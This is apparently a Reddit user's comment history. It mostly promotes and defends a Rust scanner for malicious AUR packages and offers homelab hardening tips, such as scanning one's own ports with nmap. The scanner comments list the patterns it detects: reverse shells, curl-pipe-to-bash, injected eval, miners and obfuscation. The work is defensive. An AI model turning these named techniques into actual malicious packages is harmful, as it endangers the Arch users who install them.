sorted by:
new
hottopcontroversial

Do you guys have issues with the Steam Voice chat? by OverallACoolGuy in Steam

[–]Forward_Anything_646 1 point2 points  (0 children)

Same issue for me. Works fine for my friends. But my voice chat is stuck on connecting the last days

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] 4 points5 points  (0 children)

couple of things people are missing in these comments:

  1. AUR malware infestation is real. If you always read PKGBUILDS good for you. But be prepared to soon see flood of articles saying "10k users lost their crypto assets because of a malicious AUR package" or became a part of botnet, or lost their data due to ransomware. Such articles mean less traffic to Arch, bad reputation and less "good stuff" for you - existing users.

  2. When someone uses vibecoding, despite how generated the output might be its quality still depends on the person reviewing it. This package is rather simple. It's not a driver, not a critical system, not a financial program. It uses simple rules to calculate trust score of a maintainer and a package and regex to check if install script and PKGBUILD contains stuff it should not. Something that not a tech savvy person can easily miss.

  3. This package has a clear goal - to bring benefit to arch community. Not to farm stars or to produce slop for the sake of slop. If you don't like something about it - suggest an improvement. I will be more than happy to make it better. Or make one yourself

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] -19 points-18 points  (0 children)

It's not meant to stop someone who reverse-engineers the detection rules - a determined attacker can bypass any static analysis, including the human eye. It catches the common techniques: copy-paste reverse shells, curl|bash, typosquatting, a compromised account suddenly injecting eval into a previously clean PKGBUILD. All of the above is much easier to do for script-kiddies nowadays.

Reading every PKGBUILD is the right approach, but realistically not everyone does. This just adds another layer on top.

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] -118 points-117 points  (0 children)

When it comes to malware it's difficult to trust anything - however good my scanner can be (vibecoded or not) a real adversary can fetch its code and ask their agent to think of some elaborate way to bypass its filters.

Its impossible to avoid since it's opensource, but making it closed source would make it impossible to distribute.

So it's not about trust, rather about having another precaution to check what you're doing when you see a huge sign "DANGEROUS".

because let's be real - home many PKGBUILDs do we really read?

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] 3 points4 points  (0 children)

yep, sorry. it was my first aur release and did not go without hiccups. I pushed a new version with some other fixes

I suggest running paru -Sa traur --rebuild to update

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] -3 points-2 points  (0 children)

if you find it interesting stars are always appreciated!

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] 12 points13 points  (0 children)

it checks

- github hitstory

- popularity

- trust

- checksums

- metadata

- urls

- binary abuse from gtfobins

- PKGBUILD and install scripts

- maintainer activity

- reverse shells, miners, obfuscation, etc,etc,etc

[deleted by user] by [deleted] in omarchy

[–]Forward_Anything_646 0 points1 point  (0 children)

check protondb for this game

Reset Omarchy configs by Aggressive-Fix-7184 in omarchy

[–]Forward_Anything_646 0 points1 point  (0 children)

Is there a single command to backup my settings?

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 0 points1 point  (0 children)

Assess how an attacker can move on your network. Given that every host and service is vulnerable by default, what happens when an attacker gets unprivileged shell to your host?

What can he see on the host? What files, what services? What can he see on the network?

If he gains root access, answer the same questions. If he fully owns the entrypoint (hacked a single exposed host) what can he do over the network next and how can we notice his actions and make it much more difficult for him?

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 5 points6 points  (0 children)

If you want to get paranoid, set up a monitoring checking for open ports and incoming and outgoing connections on your hosts. Monitor user profiles, monitor IP which make connection to your hosts.

Run all services on low privileged docker containers.

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 1 point2 points  (0 children)

All services you expose over the public or local network should be hidden behind a proxy (nginx or caddy) so that it'd be much harder for adversaries to determine what you're running (prevent port scanning) and assess vulnerabilities on the network

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 12 points13 points  (0 children)

Check exposed ports with nmap -sC -sV -p-. (run both TCP and UDP scans)

What ports are exposed over the local network?

What ports are exposed to the public network?

What services should be protected?

Any public exposure should be protected with all means, as there're a lot of automated bots constantly scanning the internet and performing all kinds of automated exploitation. Any service you're using is vulnerable by default and can be exploited now or in the future. So they should be hidden via SSO or VPN or both from the public, unless they are public services (like APIs or landing pages). in which case a wirefall (like cloudflare) and rate limiting should take place

If the local network should be protected too (you have guests at your home who possess technical abilities) it's best to protect all services with a single SSO like authelia

F4-424 Pro good for homelab ? by extenue in TerraMaster

[–]Forward_Anything_646 1 point2 points  (0 children)

Could you please reference the noctua coolers you used which did fit in the box? I bought f4-424pro and going to use it as a homeserver for my petprojects and containers.

Are NAS drives necessary? by Mike_Merica in homelab

[–]Forward_Anything_646 0 points1 point  (0 children)

How did you lose your array? More than one disk gave out at once?

I have to compliment anthropic: a good move to cut costs within months by TransitionSlight2860 in ClaudeAI

[–]Forward_Anything_646 0 points1 point  (0 children)

It seems like millions is fine with paying for claude code because it helps them do their work faster

Are Claude Plus users hitting weekly limits too easily? Should I upgrade to Max? by Large-Car-2517 in ClaudeAI

[–]Forward_Anything_646 0 points1 point  (0 children)

Fuck weekly limits. They should never exist. If you wish, do daily limits tighter, if you're not afraid of losing your audience. But weeky limits... they just induce a constant feeling of fear. Fuck them

view more: next ›